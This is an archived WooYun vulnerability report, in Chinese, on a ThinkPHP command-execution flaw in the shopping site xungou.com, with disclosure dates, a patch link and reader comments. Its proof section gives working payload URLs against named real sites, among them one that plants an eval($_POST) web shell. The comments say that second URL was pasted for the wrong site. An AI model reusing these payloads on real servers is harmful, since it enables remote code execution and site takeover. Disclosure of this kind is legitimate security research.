当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010921

漏洞标题:大型购物网站寻购网(原迅购网)任意代码执行漏洞及内网渗透

相关厂商:寻购网(原迅购网)

漏洞作者: 咚咚呛

提交时间:2012-08-15 10:06

修复时间:2012-09-29 10:07

公开时间:2012-09-29 10:07

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大型购物网站寻购网(原迅购网)任意代码执行漏洞,本身网站设置权限问题,造成N多网站受到影响。

详细说明:

大型购物网站寻购网(原迅购网)任意代码执行漏洞,本身网站设置权限问题,可造成同服务器N多网站受到影响。进一步可渗透内网,造成危害。
漏洞网站地址:
http://t.xungou.com/
用的phpthink框架 存在命令执行漏洞。

漏洞证明:

http://t.xungou.com/index.php/module/action/param1/$%7B@phpinfo()%7D


可直接拿到shell
直接拿shell:
http://a.tudou.com/specapp/index.php/module/action/param1/${@eval%28$_POST[f]%29}

修复方案:

建议网站及时打上补丁。
官方补丁:http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

版权声明:转载请注明来源 咚咚呛@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-06-20 07:11 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    最下面的直接拿shell:http://a.tudou.com/specapp/index.php/module/action/param1/${@eval%28$_POST[f]%29}怎么是土豆啊。。

  2. 2015-06-20 22:56 | 咚咚呛 ( 普通白帽子 | Rank:116 漏洞数:10 | 我是一只小毛驴咿呀咿呀呦~~)

    @小龙 挖坟了...那会还没信任乌云呢,洞复制错了

  3. 2015-06-21 01:12 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @咚咚呛 - -